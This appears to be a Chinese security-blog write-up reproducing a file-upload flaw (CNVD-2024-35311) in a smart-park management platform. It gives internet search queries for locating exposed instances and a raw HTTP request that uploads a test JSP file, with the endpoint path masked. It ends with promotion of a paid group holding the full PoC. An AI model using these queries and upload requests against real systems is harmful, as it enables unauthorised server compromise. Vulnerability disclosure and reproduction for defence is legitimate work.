【0day漏洞复现】某华智慧园区综合管理平台文件上传漏洞(CNVD2024-35311)

【0day漏洞复现】某华智慧园区综合管理平台文件上传漏洞(CNVD2024-35311)

如棠安全 如棠安全 2025-05-14 00:10


「此公众号所分享的网络安全知识、信息及工具仅供学习和研究使用,不得用于非法活动。此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!」「如有内容侵权,请联系我们删除处理。谢谢合作!!!」

资产测绘

  • 「Hunter」


web.body=”智慧园区综合管理平台”

  • 「Fofa」


body=”智慧园区综合管理平台”

审计发现漏洞

漏洞复现

「1、构造数据包」

POST /XXXXX/XXXXXXXXXXX HTTP/1.1Host:192.168.10.1:9443User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15Accept-Encoding: gzip, deflateConnection: keep-aliveContent-Type: multipart/form-data;boundary=----WebKitFormBoundary7MA4YWxkTrZu0gWContent-Length: 336   ------WebKitFormBoundary7MA4YWxkTrZu0gWContent-Disposition: form-data; name="updateBean.loadCab"; filename="abc.jsp"Content-Type: text/plain    <% out.print("ceshi");%>------WebKitFormBoundary7MA4YWxkTrZu0gWContent-Disposition: form-data; name="updateBean.loadCabFileName"    abc.jsp------WebKitFormBoundary7MA4YWxkTrZu0gW--

「2、查看上传的文件」

GET /portal/20250513XXXXXXXXX.jsp HTTP/1.1Host: 192.168.10.1:9443

完整POC获取

文章中涉及的完整POC及代码审计报告已上传至纷传圈子中

需要的师傅可以自取哈

🚀 新圈子上线 | 高质量安全内容持续更新中!

我最近在纷传上建立了一个全新的安全技术圈子,主要聚焦于 WEB安全、APP安全、代码审计、漏洞分享
 等核心方向。目前圈子刚刚建立,内容还不算多,但会持续高频更新
,只分享真正有价值、有深度的干货文章。

📚 圈子中包含:
– 高质量原创或精选的安全技术文章

  • 公众号历史付费内容免费查看(如:小程序RPC、APP抓包解决方案)

  • 一些只在圈子内分享的独家思路和实战经验